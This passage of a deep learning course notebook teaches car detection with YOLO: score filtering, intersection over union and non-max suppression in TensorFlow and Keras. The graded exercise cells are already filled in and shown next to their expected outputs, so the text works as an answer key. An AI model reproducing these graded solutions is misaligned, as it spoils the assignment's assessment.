Run the following cell to load the packages and dependencies that you will find useful as you build the object detector!
```
import argparse
import os
import matplotlib.pyplot as plt
from matplotlib.pyplot import imshow
import scipy.io
import scipy.misc
import numpy as np
import pandas as pd
import PIL
import tensorflow as tf
from keras import backend as K
from keras.layers import Input, Lambda, Conv2D
from keras.models import load_model, Model
from yolo_utils import read_classes, read_anchors, generate_colors, preprocess_image, draw_boxes, scale_boxes
from yad2k.models.keras_yolo import yolo_head, yolo_boxes_to_corners, preprocess_true_boxes, yolo_loss, yolo_body
%matplotlib inline
```
**Important Note**: As you can see, we import Keras's backend as K. This means that to use a Keras function in this notebook, you will need to write: `K.function(...)`.
## 1 - Problem Statement
You are working on a self-driving car. As a critical component of this project, you'd like to first build a car detection system. To collect data, you've mounted a camera to the hood (meaning the front) of the car, which takes pictures of the road ahead every few seconds while you drive around.
<center>
<video width="400" height="200" src="nb_images/road_video_compressed2.mp4" type="video/mp4" controls>
</video>
</center>
<caption><center> Pictures taken from a car-mounted camera while driving around Silicon Valley. <br> We thank [drive.ai](https://www.drive.ai/) for providing this dataset.
</center></caption>
You've gathered all these images into a folder and have labelled them by drawing bounding boxes around every car you found. Here's an example of what your bounding boxes look like.
<img src="nb_images/box_label.png" style="width:500px;height:250px;">
<caption><center> <u> **Figure 1** </u>: **Definition of a box**<br> </center></caption>
If you have 80 classes that you want the object detector to recognize, you can represent the class label $c$ either as an integer from 1 to 80, or as an 80-dimensional vector (with 80 numbers) one component of which is 1 and the rest of which are 0. The video lectures had used the latter representation; in this notebook, we will use both representations, depending on which is more convenient for a particular step.
In this exercise, you will learn how "You Only Look Once" (YOLO) performs object detection, and then apply it to car detection. Because the YOLO model is very computationally expensive to train, we will load pre-trained weights for you to use.
## 2 - YOLO
"You Only Look Once" (YOLO) is a popular algorithm because it achieves high accuracy while also being able to run in real-time. This algorithm "only looks once" at the image in the sense that it requires only one forward propagation pass through the network to make predictions. After non-max suppression, it then outputs recognized objects together with the bounding boxes.
### 2.1 - Model details
#### Inputs and outputs
- The **input** is a batch of images, and each image has the shape (m, 608, 608, 3)
- The **output** is a list of bounding boxes along with the recognized classes. Each bounding box is represented by 6 numbers $(p_c, b_x, b_y, b_h, b_w, c)$ as explained above. If you expand $c$ into an 80-dimensional vector, each bounding box is then represented by 85 numbers.
#### Anchor Boxes
* Anchor boxes are chosen by exploring the training data to choose reasonable height/width ratios that represent the different classes. For this assignment, 5 anchor boxes were chosen for you (to cover the 80 classes), and stored in the file './model_data/yolo_anchors.txt'
* The dimension for anchor boxes is the second to last dimension in the encoding: $(m, n_H,n_W,anchors,classes)$.
* The YOLO architecture is: IMAGE (m, 608, 608, 3) -> DEEP CNN -> ENCODING (m, 19, 19, 5, 85).
#### Encoding
Let's look in greater detail at what this encoding represents.
<img src="nb_images/architecture.png" style="width:700px;height:400px;">
<caption><center> <u> **Figure 2** </u>: **Encoding architecture for YOLO**<br> </center></caption>
If the center/midpoint of an object falls into a grid cell, that grid cell is responsible for detecting that object.
Since we are using 5 anchor boxes, each of the 19x19 cells thus encodes information about 5 boxes. Anchor boxes are defined only by their width and height.
For simplicity, we will flatten the last two dimensions of the shape (19, 19, 5, 85) encoding. So the output of the Deep CNN is (19, 19, 425).
<img src="nb_images/flatten.png" style="width:700px;height:400px;">
<caption><center> <u> **Figure 3** </u>: **Flattening the last two dimensions**<br> </center></caption>
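This flattening step is a plain reshape of the last two dimensions, for instance:

```python
import numpy as np

# A dummy encoding with the YOLO output shape: 19x19 grid cells,
# 5 anchor boxes, 85 numbers per box (p_c, b_x, b_y, b_h, b_w + 80 classes).
encoding = np.zeros((19, 19, 5, 85))
flattened = encoding.reshape(19, 19, -1)  # merge the last two axes
```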
#### Class score
Now, for each box (of each cell) we will compute the following element-wise product and extract a probability that the box contains a certain class.
The class score is $score_{c,i} = p_{c} \times c_{i}$: the probability that there is an object $p_{c}$ times the probability that the object is a certain class $c_{i}$.
<img src="nb_images/probability_extraction.png" style="width:700px;height:400px;">
<caption><center> <u> **Figure 4** </u>: **Find the class detected by each box**<br> </center></caption>
##### Example of figure 4
* In figure 4, let's say for box 1 (cell 1), the probability that an object exists is $p_{1}=0.60$. So there's a 60% chance that an object exists in box 1 (cell 1).
* The probability that the object is the class "category 3 (a car)" is $c_{3}=0.73$.
* The score for box 1 and for category "3" is $score_{1,3}=0.60 \times 0.73 = 0.44$.
* Let's say we calculate the score for all 80 classes in box 1, and find that the score for the car class (class 3) is the maximum. So we'll assign the score 0.44 and class "3" to this box "1".
#### Visualizing classes
Here's one way to visualize what YOLO is predicting on an image:
- For each of the 19x19 grid cells, find the maximum of the probability scores (taking a max across the 80 classes, one maximum for each of the 5 anchor boxes).
- Color that grid cell according to what object that grid cell considers the most likely.
Doing this results in this picture:
<img src="nb_images/proba_map.png" style="width:300px;height:300px;">
<caption><center> <u> **Figure 5** </u>: Each one of the 19x19 grid cells is colored according to which class has the largest predicted probability in that cell.<br> </center></caption>
Note that this visualization isn't a core part of the YOLO algorithm itself for making predictions; it's just a nice way of visualizing an intermediate result of the algorithm.
#### Visualizing bounding boxes
Another way to visualize YOLO's output is to plot the bounding boxes that it outputs. Doing that results in a visualization like this:
<img src="nb_images/anchor_map.png" style="width:200px;height:200px;">
<caption><center> <u> **Figure 6** </u>: Each cell gives you 5 boxes. In total, the model predicts: 19x19x5 = 1805 boxes just by looking once at the image (one forward pass through the network)! Different colors denote different classes. <br> </center></caption>
#### Non-Max suppression
In the figure above, we plotted only boxes for which the model had assigned a high probability, but this is still too many boxes. You'd like to reduce the algorithm's output to a much smaller number of detected objects.
To do so, you'll use **non-max suppression**. Specifically, you'll carry out these steps:
- Get rid of boxes with a low score (meaning, the box is not very confident about detecting a class; either due to the low probability of any object, or low probability of this particular class).
- Select only one box when several boxes overlap with each other and detect the same object.
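The second step relies on intersection over union (IoU) to decide when two boxes "overlap and detect the same object". As a generic illustration (not the graded `iou`/`yolo_non_max_suppression` implementations of this assignment), here is a minimal NumPy sketch of IoU and greedy non-max suppression on corner-format boxes `(x1, y1, x2, y2)`:

```python
import numpy as np

def iou(box1, box2):
    """Intersection over union of two (x1, y1, x2, y2) boxes."""
    xi1, yi1 = max(box1[0], box2[0]), max(box1[1], box2[1])
    xi2, yi2 = min(box1[2], box2[2]), min(box1[3], box2[3])
    inter = max(0.0, xi2 - xi1) * max(0.0, yi2 - yi1)
    area1 = (box1[2] - box1[0]) * (box1[3] - box1[1])
    area2 = (box2[2] - box2[0]) * (box2[3] - box2[1])
    return inter / (area1 + area2 - inter)

def nms(boxes, scores, iou_threshold=0.5):
    """Greedy NMS: keep the highest-scoring box, drop boxes overlapping it."""
    order = np.argsort(scores)[::-1]  # indices by descending score
    keep = []
    while len(order):
        best = order[0]
        keep.append(best)
        order = order[1:][[iou(boxes[best], boxes[i]) <= iou_threshold
                           for i in order[1:]]]
    return keep

# Two near-duplicate detections plus one separate box:
boxes = np.array([[0, 0, 2, 2], [0, 0, 2, 2.2], [3, 3, 4, 4]], dtype=float)
kept = nms(boxes, np.array([0.9, 0.8, 0.7]))
```

In the exercises below, the same effect is achieved with TensorFlow's built-in `tf.image.non_max_suppression`.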
### 2.2 - Filtering with a threshold on class scores
You are going to first apply a filter by thresholding. You would like to get rid of any box for which the class "score" is less than a chosen threshold.
The model gives you a total of 19x19x5x85 numbers, with each box described by 85 numbers. It is convenient to rearrange the (19,19,5,85) (or (19,19,425)) dimensional tensor into the following variables:
- `box_confidence`: tensor of shape $(19 \times 19, 5, 1)$ containing $p_c$ (confidence probability that there's some object) for each of the 5 boxes predicted in each of the 19x19 cells.
- `boxes`: tensor of shape $(19 \times 19, 5, 4)$ containing the midpoint and dimensions $(b_x, b_y, b_h, b_w)$ for each of the 5 boxes in each cell.
- `box_class_probs`: tensor of shape $(19 \times 19, 5, 80)$ containing the "class probabilities" $(c_1, c_2, ... c_{80})$ for each of the 80 classes for each of the 5 boxes per cell.
#### **Exercise**: Implement `yolo_filter_boxes()`.
1. Compute box scores by doing the elementwise product as described in Figure 4 ($p \times c$).
The following code may help you choose the right operator:
```python
a = np.random.randn(19*19, 5, 1)
b = np.random.randn(19*19, 5, 80)
c = a * b # shape of c will be (19*19, 5, 80)
```
This is an example of **broadcasting** (multiplying vectors of different sizes).
2. For each box, find:
- the index of the class with the maximum box score
- the corresponding box score
**Useful references**
* [Keras argmax](https://keras.io/backend/#argmax)
* [Keras max](https://keras.io/backend/#max)
**Additional Hints**
* For the `axis` parameter of `argmax` and `max`, if you want to select the **last** axis, one way to do so is to set `axis=-1`. This is similar to Python array indexing, where you can select the last position of an array using `arrayname[-1]`.
* Applying `max` normally collapses the axis over which the maximum is taken. `keepdims=False` is the default, so that dimension is removed; we don't need to keep the last dimension after taking the maximum here.
* Even though the documentation shows `keras.backend.argmax`, the backend is imported as `K` in this notebook, so call `K.argmax`. Similarly, use `K.max`.
3. Create a mask by using a threshold. As a reminder, comparisons on arrays are elementwise: `np.array([0.9, 0.3, 0.4, 0.5, 0.1]) < 0.4` returns `[False, True, False, False, True]`. The mask should be True for the boxes you want to keep.
4. Use TensorFlow to apply the mask to `box_class_scores`, `boxes` and `box_classes` to filter out the boxes we don't want. You should be left with just the subset of boxes you want to keep.
**Useful reference**:
* [boolean mask](https://www.tensorflow.org/api_docs/python/tf/boolean_mask)
**Additional Hints**:
* For the `tf.boolean_mask`, we can keep the default `axis=None`.
**Reminder**: to call a Keras function, you should use `K.function(...)`.
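Before the graded TensorFlow version below, the same four steps can be sketched in plain NumPy; the random inputs and the 0.6 threshold are stand-ins that only mirror the exercise shapes:

```python
import numpy as np

np.random.seed(0)
box_confidence = np.random.rand(19 * 19, 5, 1)    # p_c for each of the 5 boxes per cell
box_class_probs = np.random.rand(19 * 19, 5, 80)  # c_1..c_80 for each box

# Step 1: elementwise product with broadcasting -> shape (361, 5, 80)
box_scores = box_confidence * box_class_probs
# Step 2: best class and its score for each box
box_classes = np.argmax(box_scores, axis=-1)      # shape (361, 5)
box_class_scores = np.max(box_scores, axis=-1)    # shape (361, 5)
# Steps 3-4: threshold mask, then boolean indexing (NumPy's analog of tf.boolean_mask)
mask = box_class_scores >= 0.6
kept_scores = box_class_scores[mask]
print(box_scores.shape, mask.shape, kept_scores.shape)
```

The graded version replaces `np.argmax`/`np.max` with `K.argmax`/`K.max` and the boolean indexing with `tf.boolean_mask`.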
```
# GRADED FUNCTION: yolo_filter_boxes
def yolo_filter_boxes(box_confidence, boxes, box_class_probs, threshold = .6):
"""Filters YOLO boxes by thresholding on object and class confidence.
Arguments:
box_confidence -- tensor of shape (19, 19, 5, 1)
boxes -- tensor of shape (19, 19, 5, 4)
box_class_probs -- tensor of shape (19, 19, 5, 80)
threshold -- real value, if [ highest class probability score < threshold], then get rid of the corresponding box
Returns:
scores -- tensor of shape (None,), containing the class probability score for selected boxes
boxes -- tensor of shape (None, 4), containing (b_x, b_y, b_h, b_w) coordinates of selected boxes
classes -- tensor of shape (None,), containing the index of the class detected by the selected boxes
Note: "None" is here because you don't know the exact number of selected boxes, as it depends on the threshold.
For example, the actual output size of scores would be (10,) if there are 10 boxes.
"""
# Step 1: Compute box scores
### START CODE HERE ### (≈ 1 line)
box_scores = box_confidence * box_class_probs
### END CODE HERE ###
# Step 2: Find the box_classes using the max box_scores, keep track of the corresponding score
### START CODE HERE ### (≈ 2 lines)
box_classes = K.argmax(box_scores, axis=-1)
box_class_scores = K.max(box_scores, axis=-1)
### END CODE HERE ###
# Step 3: Create a filtering mask based on "box_class_scores" by using "threshold". The mask should have the
# same dimension as box_class_scores, and be True for the boxes you want to keep (with probability >= threshold)
### START CODE HERE ### (≈ 1 line)
filtering_mask = box_class_scores >= threshold
### END CODE HERE ###
# Step 4: Apply the mask to box_class_scores, boxes and box_classes
### START CODE HERE ### (≈ 3 lines)
scores = tf.boolean_mask(box_class_scores, filtering_mask)
boxes = tf.boolean_mask(boxes, filtering_mask)
classes = tf.boolean_mask(box_classes, filtering_mask)
### END CODE HERE ###
return scores, boxes, classes
with tf.Session() as test_a:
box_confidence = tf.random_normal([19, 19, 5, 1], mean=1, stddev=4, seed = 1)
boxes = tf.random_normal([19, 19, 5, 4], mean=1, stddev=4, seed = 1)
box_class_probs = tf.random_normal([19, 19, 5, 80], mean=1, stddev=4, seed = 1)
scores, boxes, classes = yolo_filter_boxes(box_confidence, boxes, box_class_probs, threshold = 0.5)
print("scores[2] = " + str(scores[2].eval()))
print("boxes[2] = " + str(boxes[2].eval()))
print("classes[2] = " + str(classes[2].eval()))
print("scores.shape = " + str(scores.shape))
print("boxes.shape = " + str(boxes.shape))
print("classes.shape = " + str(classes.shape))
```
**Expected Output**:
<table>
<tr>
<td>
**scores[2]**
</td>
<td>
10.7506
</td>
</tr>
<tr>
<td>
**boxes[2]**
</td>
<td>
[ 8.42653275 3.27136683 -0.5313437 -4.94137383]
</td>
</tr>
<tr>
<td>
**classes[2]**
</td>
<td>
7
</td>
</tr>
<tr>
<td>
**scores.shape**
</td>
<td>
(?,)
</td>
</tr>
<tr>
<td>
**boxes.shape**
</td>
<td>
(?, 4)
</td>
</tr>
<tr>
<td>
**classes.shape**
</td>
<td>
(?,)
</td>
</tr>
</table>
**Note** In the test for `yolo_filter_boxes`, we're using random numbers to test the function. In real data, the `box_class_probs` would contain non-zero values between 0 and 1 for the probabilities. The box coordinates in `boxes` would also be chosen so that lengths and heights are non-negative.
### 2.3 - Non-max suppression ###
Even after filtering by thresholding over the class scores, you still end up with a lot of overlapping boxes. A second filter for selecting the right boxes is called non-maximum suppression (NMS).
<img src="nb_images/non-max-suppression.png" style="width:500px;height:400;">
<caption><center> <u> **Figure 7** </u>: In this example, the model has predicted 3 cars, but it's actually 3 predictions of the same car. Running non-max suppression (NMS) will select only the most accurate (highest probability) of the 3 boxes. <br> </center></caption>
Non-max suppression uses the very important function called **"Intersection over Union"**, or IoU.
<img src="nb_images/iou.png" style="width:500px;height:400;">
<caption><center> <u> **Figure 8** </u>: Definition of "Intersection over Union". <br> </center></caption>
#### **Exercise**: Implement iou(). Some hints:
- In this code, we use the convention that (0,0) is the top-left corner of an image, (1,0) is the upper-right corner, and (1,1) is the lower-right corner. In other words, the (0,0) origin starts at the top left corner of the image. As x increases, we move to the right. As y increases, we move down.
- For this exercise, we define a box using its two corners: upper left $(x_1, y_1)$ and lower right $(x_2,y_2)$, instead of using the midpoint, height and width. (This makes it a bit easier to calculate the intersection).
- To calculate the area of a rectangle, multiply its height $(y_2 - y_1)$ by its width $(x_2 - x_1)$. (Since $(x_1,y_1)$ is the top left and $(x_2,y_2)$ is the bottom right, these differences should be non-negative.)
- To find the **intersection** of the two boxes $(xi_{1}, yi_{1}, xi_{2}, yi_{2})$:
- Feel free to draw some examples on paper to clarify this conceptually.
- The top left corner of the intersection $(xi_{1}, yi_{1})$ is found by comparing the top left corners $(x_1, y_1)$ of the two boxes and finding a vertex that has an x-coordinate that is closer to the right, and y-coordinate that is closer to the bottom.
- The bottom right corner of the intersection $(xi_{2}, yi_{2})$ is found by comparing the bottom right corners $(x_2,y_2)$ of the two boxes and finding a vertex whose x-coordinate is closer to the left, and the y-coordinate that is closer to the top.
- The two boxes **may have no intersection**. You can detect this if the intersection coordinates you calculate end up being the top right and/or bottom left corners of an intersection box. Another way to think of this is if you calculate the height $(y_2 - y_1)$ or width $(x_2 - x_1)$ and find that at least one of these lengths is negative, then there is no intersection (intersection area is zero).
- The two boxes may intersect at the **edges or vertices**, in which case the intersection area is still zero. This happens when either the height or width (or both) of the calculated intersection is zero.
**Additional Hints**
- `xi1` = **max**imum of the x1 coordinates of the two boxes
- `yi1` = **max**imum of the y1 coordinates of the two boxes
- `xi2` = **min**imum of the x2 coordinates of the two boxes
- `yi2` = **min**imum of the y2 coordinates of the two boxes
- `inter_area` = You can use `max(height, 0)` and `max(width, 0)`
```
# GRADED FUNCTION: iou
def iou(box1, box2):
"""Implement the intersection over union (IoU) between box1 and box2
Arguments:
box1 -- first box, list object with coordinates (box1_x1, box1_y1, box1_x2, box_1_y2)
box2 -- second box, list object with coordinates (box2_x1, box2_y1, box2_x2, box2_y2)
"""
# Assign variable names to coordinates for clarity
(box1_x1, box1_y1, box1_x2, box1_y2) = box1
(box2_x1, box2_y1, box2_x2, box2_y2) = box2
# Calculate the (yi1, xi1, yi2, xi2) coordinates of the intersection of box1 and box2. Calculate its Area.
### START CODE HERE ### (≈ 7 lines)
xi1 = max(box1[0], box2[0])
yi1 = max(box1[1], box2[1])
xi2 = min(box1[2], box2[2])
yi2 = min(box1[3], box2[3])
inter_width = max(xi2 - xi1, 0)
inter_height = max(yi2 - yi1, 0)
inter_area = inter_width * inter_height
### END CODE HERE ###
# Calculate the Union area by using Formula: Union(A,B) = A + B - Inter(A,B)
### START CODE HERE ### (≈ 3 lines)
box1_area = (box1[2] - box1[0]) * (box1[3] - box1[1])
box2_area = (box2[2] - box2[0]) * (box2[3] - box2[1])
union_area = box1_area + box2_area - inter_area
### END CODE HERE ###
# compute the IoU
### START CODE HERE ### (≈ 1 line)
iou = inter_area / union_area
### END CODE HERE ###
return iou
## Test case 1: boxes intersect
box1 = (2, 1, 4, 3)
box2 = (1, 2, 3, 4)
print("iou for intersecting boxes = " + str(iou(box1, box2)))
## Test case 2: boxes do not intersect
box1 = (1,2,3,4)
box2 = (5,6,7,8)
print("iou for non-intersecting boxes = " + str(iou(box1,box2)))
## Test case 3: boxes intersect at vertices only
box1 = (1,1,2,2)
box2 = (2,2,3,3)
print("iou for boxes that only touch at vertices = " + str(iou(box1,box2)))
## Test case 4: boxes intersect at edge only
box1 = (1,1,3,3)
box2 = (2,3,3,4)
print("iou for boxes that only touch at edges = " + str(iou(box1,box2)))
```
**Expected Output**:
```
iou for intersecting boxes = 0.14285714285714285
iou for non-intersecting boxes = 0.0
iou for boxes that only touch at vertices = 0.0
iou for boxes that only touch at edges = 0.0
```
#### YOLO non-max suppression
You are now ready to implement non-max suppression. The key steps are:
1. Select the box that has the highest score.
2. Compute the overlap of this box with all other boxes, and remove boxes that overlap significantly (iou >= `iou_threshold`).
3. Go back to step 1 and iterate until there are no more boxes with a lower score than the currently selected box.
This will remove all boxes that have a large overlap with the selected boxes. Only the "best" boxes remain.
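A minimal pure-Python sketch of these three steps (the graded function below delegates this loop to TensorFlow's built-in op); `simple_iou` is an illustrative helper in the corner format of the `iou()` exercise above:

```python
def simple_iou(b1, b2):
    # corner-format (x1, y1, x2, y2) IoU, as in the iou() exercise above
    xi1, yi1 = max(b1[0], b2[0]), max(b1[1], b2[1])
    xi2, yi2 = min(b1[2], b2[2]), min(b1[3], b2[3])
    inter = max(xi2 - xi1, 0) * max(yi2 - yi1, 0)
    area1 = (b1[2] - b1[0]) * (b1[3] - b1[1])
    area2 = (b2[2] - b2[0]) * (b2[3] - b2[1])
    return inter / (area1 + area2 - inter)

def greedy_nms(boxes, scores, iou_threshold=0.5):
    # Step 1: take the highest-scoring remaining box; Step 2: drop boxes that
    # overlap it too much; Step 3: repeat until nothing is left.
    order = sorted(range(len(scores)), key=lambda i: scores[i], reverse=True)
    keep = []
    while order:
        best = order.pop(0)
        keep.append(best)
        order = [i for i in order
                 if simple_iou(boxes[best], boxes[i]) < iou_threshold]
    return keep

# Three heavily overlapping detections of one car, plus one separate box:
boxes = [(0, 0, 2, 2), (0.1, 0.1, 2, 2), (0, 0, 1.9, 2.1), (5, 5, 6, 6)]
scores = [0.9, 0.8, 0.7, 0.6]
print(greedy_nms(boxes, scores))  # -> [0, 3]
```

Only the best box per cluster of overlapping detections survives, which is exactly what Figure 7 illustrates.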
**Exercise**: Implement yolo_non_max_suppression() using TensorFlow. TensorFlow has two built-in functions that are used to implement non-max suppression (so you don't actually need to use your `iou()` implementation):
** Reference documentation **
- [tf.image.non_max_suppression()](https://www.tensorflow.org/api_docs/python/tf/image/non_max_suppression)
```
tf.image.non_max_suppression(
boxes,
scores,
max_output_size,
iou_threshold=0.5,
name=None
)
```
Note that in the version of TensorFlow used here, there is no `score_threshold` parameter (it appears in the documentation for the latest version), so trying to set this value will result in the error message: *got an unexpected keyword argument 'score_threshold'*.
- [K.gather()](https://www.tensorflow.org/api_docs/python/tf/keras/backend/gather)
Even though the documentation shows `tf.keras.backend.gather()`, you can use `K.gather()`.
```
K.gather(
reference,
indices
)
```
```
# GRADED FUNCTION: yolo_non_max_suppression
def yolo_non_max_suppression(scores, boxes, classes, max_boxes = 10, iou_threshold = 0.5):
"""
Applies Non-max suppression (NMS) to set of boxes
Arguments:
scores -- tensor of shape (None,), output of yolo_filter_boxes()
boxes -- tensor of shape (None, 4), output of yolo_filter_boxes() that have been scaled to the image size (see later)
classes -- tensor of shape (None,), output of yolo_filter_boxes()
max_boxes -- integer, maximum number of predicted boxes you'd like
iou_threshold -- real value, "intersection over union" threshold used for NMS filtering
Returns:
scores -- tensor of shape (, None), predicted score for each box
boxes -- tensor of shape (4, None), predicted box coordinates
classes -- tensor of shape (, None), predicted class for each box
Note: The "None" dimension of the output tensors has obviously to be less than max_boxes. Note also that this
function will transpose the shapes of scores, boxes, classes. This is made for convenience.
"""
max_boxes_tensor = K.variable(max_boxes, dtype='int32') # tensor to be used in tf.image.non_max_suppression()
K.get_session().run(tf.variables_initializer([max_boxes_tensor])) # initialize variable max_boxes_tensor
# Use tf.image.non_max_suppression() to get the list of indices corresponding to boxes you keep
### START CODE HERE ### (≈ 1 line)
nms_indices = tf.image.non_max_suppression(boxes, scores, max_boxes_tensor, iou_threshold)
### END CODE HERE ###
# Use K.gather() to select only nms_indices from scores, boxes and classes
### START CODE HERE ### (≈ 3 lines)
scores = K.gather(scores, nms_indices)
boxes = K.gather(boxes, nms_indices)
classes = K.gather(classes, nms_indices)
### END CODE HERE ###
return scores, boxes, classes
with tf.Session() as test_b:
scores = tf.random_normal([54,], mean=1, stddev=4, seed = 1)
boxes = tf.random_normal([54, 4], mean=1, stddev=4, seed = 1)
classes = tf.random_normal([54,], mean=1, stddev=4, seed = 1)
scores, boxes, classes = yolo_non_max_suppression(scores, boxes, classes)
print("scores[2] = " + str(scores[2].eval()))
print("boxes[2] = " + str(boxes[2].eval()))
print("classes[2] = " + str(classes[2].eval()))
print("scores.shape = " + str(scores.eval().shape))
print("boxes.shape = " + str(boxes.eval().shape))
print("classes.shape = " + str(classes.eval().shape))
```
**Expected Output**:
<table>
<tr>
<td>
**scores[2]**
</td>
<td>
6.9384
</td>
</tr>
<tr>
<td>
**boxes[2]**
</td>
<td>
[-5.299932 3.13798141 4.45036697 0.95942086]
</td>
</tr>
<tr>
<td>
**classes[2]**
</td>
<td>
-2.24527
</td>
</tr>
<tr>
<td>
**scores.shape**
</td>
<td>
(10,)
</td>
</tr>
<tr>
<td>
**boxes.shape**
</td>
<td>
(10, 4)
</td>
</tr>
<tr>
<td>
**classes.shape**
</td>
<td>
(10,)
</td>
</tr>
</table>
### 2.4 Wrapping up the filtering
It's time to implement a function taking the output of the deep CNN (the 19x19x5x85 dimensional encoding) and filtering through all the boxes using the functions you've just implemented.
**Exercise**: Implement `yolo_eval()` which takes the output of the YOLO encoding and filters the boxes using score threshold and NMS. There's just one last implementation detail you have to know. There are a few ways of representing boxes, such as via their corners or via their midpoint and height/width. YOLO converts between a few such formats at different times, using the following functions (which we have provided):
```python
boxes = yolo_boxes_to_corners(box_xy, box_wh)
```
which converts the yolo box coordinates (x,y,w,h) to box corners' coordinates (x1, y1, x2, y2) to fit the input of `yolo_filter_boxes`
```python
boxes = scale_boxes(boxes, image_shape)
```
YOLO's network was trained to run on 608x608 images. If you are testing this data on a different size image--for example, the car detection dataset had 720x1280 images--this step rescales the boxes so that they can be plotted on top of the original 720x1280 image.
Don't worry about these two functions; we'll show you where they need to be called.
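For intuition only, here is a rough NumPy sketch of what these two helpers do; the exact corner ordering and scaling conventions of the provided functions may differ, so treat this as an assumption-laden illustration rather than their actual implementation:

```python
import numpy as np

def boxes_to_corners_sketch(box_xy, box_wh):
    # midpoint (x, y) plus size (w, h) -> corners (x1, y1, x2, y2)
    return np.concatenate([box_xy - box_wh / 2.0, box_xy + box_wh / 2.0], axis=-1)

def scale_boxes_sketch(boxes, image_shape):
    # boxes relative to a unit square -> pixel coordinates for (height, width)
    h, w = image_shape
    return boxes * np.array([w, h, w, h])  # assumes the (x1, y1, x2, y2) ordering above

corners = boxes_to_corners_sketch(np.array([0.5, 0.5]), np.array([0.2, 0.4]))
print(corners)                                     # [0.4 0.3 0.6 0.7]
print(scale_boxes_sketch(corners, (720., 1280.)))  # [512. 216. 768. 504.]
```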
```
# GRADED FUNCTION: yolo_eval
def yolo_eval(yolo_outputs, image_shape = (720., 1280.), max_boxes=10, score_threshold=.6, iou_threshold=.5):
"""
Converts the output of YOLO encoding (a lot of boxes) to your predicted boxes along with their scores, box coordinates and classes.
Arguments:
yolo_outputs -- output of the encoding model (for image_shape of (608, 608, 3)), contains 4 tensors:
box_confidence: tensor of shape (None, 19, 19, 5, 1)
box_xy: tensor of shape (None, 19, 19, 5, 2)
box_wh: tensor of shape (None, 19, 19, 5, 2)
box_class_probs: tensor of shape (None, 19, 19, 5, 80)
image_shape -- tensor of shape (2,) containing the input shape, in this notebook we use (608., 608.) (has to be float32 dtype)
max_boxes -- integer, maximum number of predicted boxes you'd like
score_threshold -- real value, if [ highest class probability score < threshold], then get rid of the corresponding box
iou_threshold -- real value, "intersection over union" threshold used for NMS filtering
Returns:
scores -- tensor of shape (None, ), predicted score for each box
boxes -- tensor of shape (None, 4), predicted box coordinates
classes -- tensor of shape (None,), predicted class for each box
"""
### START CODE HERE ###
# Retrieve outputs of the YOLO model (≈1 line)
box_confidence, box_xy, box_wh, box_class_probs = yolo_outputs
# Convert boxes to be ready for filtering functions (convert boxes box_xy and box_wh to corner coordinates)
boxes = yolo_boxes_to_corners(box_xy, box_wh)
# Use one of the functions you've implemented to perform Score-filtering with a threshold of score_threshold (≈1 line)
scores, boxes, classes = yolo_filter_boxes(box_confidence, boxes, box_class_probs, threshold=score_threshold)
# Scale boxes back to original image shape.
boxes = scale_boxes(boxes, image_shape)
# Use one of the functions you've implemented to perform Non-max suppression with
# maximum number of boxes set to max_boxes and a threshold of iou_threshold (≈1 line)
scores, boxes, classes = yolo_non_max_suppression(scores, boxes, classes, max_boxes=max_boxes,
iou_threshold=iou_threshold)
### END CODE HERE ###
return scores, boxes, classes
with tf.Session() as test_b:
yolo_outputs = (tf.random_normal([19, 19, 5, 1], mean=1, stddev=4, seed = 1),
tf.random_normal([19, 19, 5, 2], mean=1, stddev=4, seed = 1),
tf.random_normal([19, 19, 5, 2], mean=1, stddev=4, seed = 1),
tf.random_normal([19, 19, 5, 80], mean=1, stddev=4, seed = 1))
scores, boxes, classes = yolo_eval(yolo_outputs)
print("scores[2] = " + str(scores[2].eval()))
print("boxes[2] = " + str(boxes[2].eval()))
print("classes[2] = " + str(classes[2].eval()))
print("scores.shape = " + str(scores.eval().shape))
print("boxes.shape = " + str(boxes.eval().shape))
print("classes.shape = " + str(classes.eval().shape))
```
**Expected Output**:
<table>
<tr>
<td>
**scores[2]**
</td>
<td>
138.791
</td>
</tr>
<tr>
<td>
**boxes[2]**
</td>
<td>
[ 1292.32971191 -278.52166748 3876.98925781 -835.56494141]
</td>
</tr>
<tr>
<td>
**classes[2]**
</td>
<td>
54
</td>
</tr>
<tr>
<td>
**scores.shape**
</td>
<td>
(10,)
</td>
</tr>
<tr>
<td>
**boxes.shape**
</td>
<td>
(10, 4)
</td>
</tr>
<tr>
<td>
**classes.shape**
</td>
<td>
(10,)
</td>
</tr>
</table>
## Summary for YOLO:
- Input image (608, 608, 3)
- The input image goes through a CNN, resulting in a (19,19,5,85) dimensional output.
- After flattening the last two dimensions, the output is a volume of shape (19, 19, 425):
- Each cell in a 19x19 grid over the input image gives 425 numbers.
- 425 = 5 x 85 because each cell contains predictions for 5 boxes, corresponding to 5 anchor boxes, as seen in lecture.
- 85 = 5 + 80 where 5 is because $(p_c, b_x, b_y, b_h, b_w)$ has 5 numbers, and 80 is the number of classes we'd like to detect
- You then select only a few boxes based on:
- Score-thresholding: throw away boxes that have detected a class with a score less than the threshold
- Non-max suppression: Compute the Intersection over Union and avoid selecting overlapping boxes
- This gives you YOLO's final output.
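The shape bookkeeping above can be checked in NumPy; the random tensor is a stand-in for the CNN output:

```python
import numpy as np

encoding = np.random.randn(19, 19, 5, 85)   # stand-in for the CNN output
flat = encoding.reshape(19, 19, 425)        # same numbers, last two dims flattened
# one cell's prediction for anchor box 2:
p_c, b_x, b_y, b_h, b_w = encoding[0, 0, 2, :5]
class_scores = encoding[0, 0, 2, 5:]        # the 80 class scores
print(flat.shape, class_scores.shape)
```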
## 3 - Test YOLO pre-trained model on images
In this part, you are going to use a pre-trained model and test it on the car detection dataset. We'll need a session to execute the computation graph and evaluate the tensors.
```
sess = K.get_session()
```
### 3.1 - Defining classes, anchors and image shape.
* Recall that we are trying to detect 80 classes, and are using 5 anchor boxes.
* We have gathered the information on the 80 classes and 5 boxes in two files "coco_classes.txt" and "yolo_anchors.txt".
* We'll read class names and anchors from text files.
* The car detection dataset has 720x1280 images, which we've pre-processed into 608x608 images.
```
class_names = read_classes("model_data/coco_classes.txt")
anchors = read_anchors("model_data/yolo_anchors.txt")
image_shape = (720., 1280.)
```
### 3.2 - Loading a pre-trained model
* Training a YOLO model takes a very long time and requires a fairly large dataset of labelled bounding boxes for a large range of target classes.
* You are going to load an existing pre-trained Keras YOLO model stored in "yolo.h5".
* These weights come from the official YOLO website, and were converted using a function written by Allan Zelener. References are at the end of this notebook. Technically, these are the parameters from the "YOLOv2" model, but we will simply refer to it as "YOLO" in this notebook.
Run the cell below to load the model from this file.
```
yolo_model = load_model("model_data/yolo.h5")
```
This loads the weights of a trained YOLO model. Here's a summary of the layers your model contains.
```
